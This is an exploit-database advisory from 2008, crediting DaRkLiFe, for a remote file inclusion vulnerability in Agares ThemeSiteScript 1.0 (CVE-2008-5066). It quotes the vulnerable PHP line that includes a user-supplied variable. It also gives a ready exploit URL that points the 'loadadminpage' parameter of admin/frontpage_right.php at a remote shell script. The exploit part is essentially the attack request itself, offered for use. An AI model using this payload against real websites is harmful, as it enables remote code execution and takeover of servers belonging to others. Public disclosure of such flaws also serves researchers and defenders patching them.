Agares ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion



EKU-ID: 14733 CVE: OSVDB-49856;CVE-2008-5066 OSVDB-ID:
Author: DaRkLiFe Published: 2008-10-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script   :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# milw0rm.com [2008-10-28]